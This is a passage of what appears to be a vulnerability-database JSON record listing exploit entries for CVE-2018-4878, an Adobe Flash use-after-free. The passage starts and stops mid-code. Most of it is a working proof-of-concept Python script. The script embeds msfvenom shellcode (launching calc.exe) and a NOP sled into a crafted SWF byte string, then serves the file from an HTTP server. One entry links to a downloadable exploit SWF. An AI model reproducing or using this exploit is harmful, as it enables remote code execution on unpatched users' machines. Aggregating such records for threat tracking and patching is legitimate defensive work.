\"HTTP/1.0\"\r\n\r\n\r\nport = 8080\r\nserver_address = ('0.0.0.0', port)\r\n\r\nHandlerClass.protocol_version = Protocol\r\nhttpd = ServerClass(server_address, HandlerClass)\r\n\r\nsa = httpd.socket.getsockname()\r\nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\"\r\nhttpd.serve_forever()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30119", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-24T18:03:14", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-24T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution Exploit (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30432", "href": "https://0day.today/exploit/description/30432", "sourceData": "## CVE-2018-4878 \r\n \r\nPop up a calculator - Requires Flash ActiveX 28.0.0.137\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf\n\n# 0day.today [2018-05-24] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30432"}], "exploitdb": [{"lastseen": "2018-05-24T14:12:47", "description": "Adobe Flash < 28.0.0.161 - Use-After-Free. CVE-2018-4878. Remote exploit for Multiple platform", "published": "2018-04-06T00:00:00", "type": "exploitdb", "title": "Adobe Flash < 28.0.0.161 - Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-04-06T00:00:00", "id": "EDB-ID:44412", "href": "https://www.exploit-db.com/exploits/44412/", "sourceData": "#!/usr/bin/env python\r\n# coding: UTF-8\r\nimport BaseHTTPServer\r\nimport sys\r\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\r\n\r\nprint \"@Syfi2k\"\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"--------------------------------\"\r\nprint \"Calc.exe Shellcode via Msfvenom\"\r\nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\"\r\nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\"\r\n\r\n\r\nbuf = \"\"\r\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n \r\npayload = buf\r\ndata = \"\"\r\nflash_name = \"movie\"\r\n \r\n\r\n\r\ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\r\n \r\n\r\nfiller = 2940 - len(payload)\r\n \r\ndata = data + payload + \"\\x90\" * filler\r\n\r\n\r\ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1F\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x3A\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x00\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x05\\x76\\x61\\x72\\x5F\\x33\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x05\\x76\\x61\\x72\\x5F\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x05\\x76\\x61\\x72\\x5F\\x35\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x76\\x6F\\x69\\x64\\x05\\x43\\x6C\\x61\\x73\\x73\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x33\\x36\\x34\\x03\\x34\\x36\\x33\\x03\\x34\\x39\\x38\\x03\\x35\\x33\\x37\\x03\\x31\\x39\\x39\\x03\\x32\\x32\\x39\\x03\\x69\\x6E\\x74\\x03\\x32\\x36\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x31\\x32\\x37\\x30\\x0D\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x06\\x53\\x70\\x72\\x69\\x74\\x65\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x0F\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0D\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x11\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x16\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x35\\x37\\x38\\x03\\x31\\x35\\x37\\x05\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x09\\x77\\x72\\x69\\x74\\x65\\x42\\x79\\x74\\x65\\x08\\x74\\x6F\\x53\\x74\\x72\\x69\\x6E\\x67\\x00\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x03\\x69\\x6E\\x74\\x04\\x06\\x07\\x06\\x07\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x0D\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x08\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0C\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x10\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3E\\x05\\x01\\x16\\x03\\x16\\x0D\\x16\\x12\\x08\\x17\\x05\\x1A\\x17\\x03\\x18\\x01\\x1A\\x01\\x1A\\x1B\\x1A\\x1C\\x1A\\x1D\\x1A\\x1E\\x1A\\x1F\\x16\\x38\\x16\\x3C\\x17\\x4D\\x16\\x49\\x16\\x44\\x16\\x49\\x16\\x49\\x16\\x49\\x08\\x46\\x17\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x05\\x51\\x18\\x51\\x1A\\x51\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x06\\x0C\\x01\\x02\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x01\\x02\\x03\\x11\\x12\\x13\\x0C\\x01\\x12\\x17\\x06\\x18\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x0C\\x12\\x17\\x18\\x0A\\x0B\\x0C\\x0D\\x0E\\x35\\x36\\x37\\x06\\x48\\x07\\x02\\x02\\x07\\x02\\x04\\x07\\x02\\x05\\x07\\x02\\x06\\x07\\x02\\x07\\x07\\x03\\x0C\\x07\\x03\\x0E\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x02\\x08\\x07\\x04\\x11\\x07\\x02\\x13\\x07\\x05\\x16\\x07\\x05\\x18\\x07\\x02\\x19\\x1B\\x01\\x07\\x02\\x21\\x07\\x02\\x22\\x07\\x01\\x23\\x07\\x02\\x25\\x07\\x01\\x26\\x07\\x02\\x27\\x07\\x01\\x28\\x07\\x02\\x2A\\x07\\x02\\x2B\\x07\\x02\\x34\\x07\\x02\\x36\\x07\\x02\\x01\\x07\\x0F\\x39\\x09\\x01\\x02\\x07\\x02\\x3A\\x07\\x10\\x3B\\x07\\x0F\\x3D\\x07\\x0F\\x3E\\x07\\x0F\\x3F\\x1B\\x03\\x07\\x12\\x43\\x07\\x13\\x45\\x07\\x12\\x47\\x07\\x12\\x48\\x07\\x12\\x4A\\x07\\x12\\x4B\\x07\\x12\\x4C\\x07\\x12\\x4F\\x07\\x12\\x4E\\x07\\x12\\x36\\x07\\x12\\x2A\\x07\\x12\\x07\\x07\\x12\\x02\\x07\\x12\\x27\\x07\\x13\\x0E\\x07\\x12\\x0F\\x07\\x12\\x10\\x07\\x12\\x08\\x07\\x12\\x05\\x07\\x12\\x13\\x07\\x17\\x16\\x07\\x17\\x18\\x1B\\x04\\x07\\x12\\x21\\x07\\x12\\x22\\x07\\x12\\x04\\x07\\x12\\x50\\x07\\x12\\x01\\x07\\x12\\x52\\x07\\x12\\x2B\\x07\\x35\\x23\\x07\\x35\\x28\\x07\\x35\\x26\\x09\\x10\\x05\\x09\\x0F\\x05\\x05\\x00\\x00\\x49\\x00\\x00\\x00\\x49\\x00\\x00\\x18\\x53\\x00\\x00\\x00\\x54\\x00\\x00\\x00\\x49\\x00\\x0A\\x2C\\x01\\x2D\\x2E\\x2C\\x01\\x2D\\x2F\\x2C\\x01\\x2D\\x30\\x2C\\x01\\x2D\\x31\\x2C\\x01\\x2D\\x32\\x2C\\x01\\x2D\\x33\\x2C\\x01\\x2D\\x35\\x2C\\x01\\x2D\\x37\\x40\\x01\\x2D\\x41\\x2C\\x01\\x2D\\x42\\x01\\x40\\x1D\\x09\\x36\\x00\\x03\\x02\\x43\\x00\\x00\\x41\\x00\\x2E\\x01\\x00\\x02\\x04\\x02\\x31\\x00\\x01\\x19\\x00\\x30\\x00\\x02\\x06\\x00\\x02\\x01\\x01\\x40\\x04\\x01\\x00\\x00\\x00\\x05\\x00\\x01\\x01\\x01\\x02\\x03\\xD0\\x30\\x47\\x00\\x00\\x01\\x02\\x01\\x01\\x08\\x23\\xD0\\x30\\x65\\x00\\x60\\x29\\x30\\x60\\x20\\x30\\x60\\x21\\x30\\x60\\x22\\x30\\x60\\x23\\x30\\x60\\x1D\\x30\\x60\\x1D\\x58\\x00\\x1D\\x1D\\x1D\\x1D\\x1D\\x1D\\x68\\x40\\x47\\x00\\x00\\x02\\x01\\x01\\x0A\\x0B\\x03\\xD0\\x30\\x47\\x00\\x00\\x03\\x03\\x01\\x0A\\x0B\\x23\\xD0\\x30\\xD0\\x49\\x00\\x5D\\x30\\x5D\\x31\\x4A\\x31\\x00\\x60\\x06\\x87\\x61\\x30\\x60\\x30\\x60\\x07\\x66\\x47\\x61\\x46\\xD0\\x5D\\x41\\xD0\\x4A\\x41\\x01\\x61\\x43\\x47\\x00\\x00\\x04\\x02\\x01\\x09\\x0A\\x09\\xD0\\x30\\x5E\\x31\\x60\\x3F\\x61\\x31\\x47\\x00\\x00\\xBF\\x14\\xD7\\x09\\x00\\x00\\x01\\x00\\x00\\x00\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x00\\x10\\x00\\x2E\\x00\\x03\\xFF\\xFF\\xFF\\xFF\\x0F\\xFF\\xFF\\xFF\\xFF\\x0F\\x00\\x02\\x00\\x00\\xE0\\xFF\\xFF\\xFF\\xEF\\x41\\x79\\x01\\x01\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x2E\\x61\\x73\\x08\\x66\\x6C\\x61\\x73\\x68\\x30\\x24\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x05\\x76\\x61\\x72\\x5F\\x31\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x0F\\x4C\\x6F\\x63\\x61\\x6C\\x43\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x69\\x6F\\x6E\\x09\\x66\\x6C\\x61\\x73\\x68\\x2E\\x6E\\x65\\x74\\x00\\x07\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x05\\x45\\x72\\x72\\x6F\\x72\\x01\\x65\\x06\\x76\\x61\\x72\\x5F\\x31\\x33\\x07\\x44\\x52\\x4D\\x5F\\x6F\\x62\\x6A\\x05\\x54\\x69\\x6D\\x65\\x72\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x76\\x61\\x72\\x5F\\x31\\x34\\x00\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x31\\x10\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\\x05\\x73\\x74\\x61\\x72\\x74\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0D\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x30\\x01\\x19\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x19\\x63\\x6F\\x6D\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x74\\x76\\x73\\x64\\x6B\\x2E\\x6D\\x65\\x64\\x69\\x61\\x63\\x6F\\x72\\x65\\x04\\x50\\x53\\x44\\x4B\\x13\\x50\\x53\\x44\\x4B\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x04\\x70\\x53\\x44\\x4B\\x10\\x63\\x72\\x65\\x61\\x74\\x65\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x11\\x63\\x72\\x65\\x61\\x74\\x65\\x4D\\x65\\x64\\x69\\x61\\x50\\x6C\\x61\\x79\\x65\\x72\\x06\\x76\\x61\\x72\\x5F\\x31\\x35\\x06\\x76\\x61\\x72\\x5F\\x31\\x36\\x0A\\x64\\x72\\x6D\\x4D\\x61\\x6E\\x61\\x67\\x65\\x72\\x0A\\x69\\x6E\\x69\\x74\\x69\\x61\\x6C\\x69\\x7A\\x65\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x32\\x04\\x76\\x6F\\x69\\x64\\x02\\x61\\x31\\x04\\x73\\x74\\x6F\\x70\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x35\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x33\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0A\\x54\\x69\\x6D\\x65\\x72\\x45\\x76\\x65\\x6E\\x74\\x02\\x64\\x64\\x02\\x1E\\x0B\\x03\\x6B\\x65\\x79\\x07\\x4D\\x65\\x6D\\x5F\\x41\\x72\\x72\\x06\\x76\\x61\\x72\\x5F\\x31\\x37\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x03\\x61\\x31\\x35\\x03\\x61\\x33\\x33\\x07\\x66\\x6C\\x61\\x7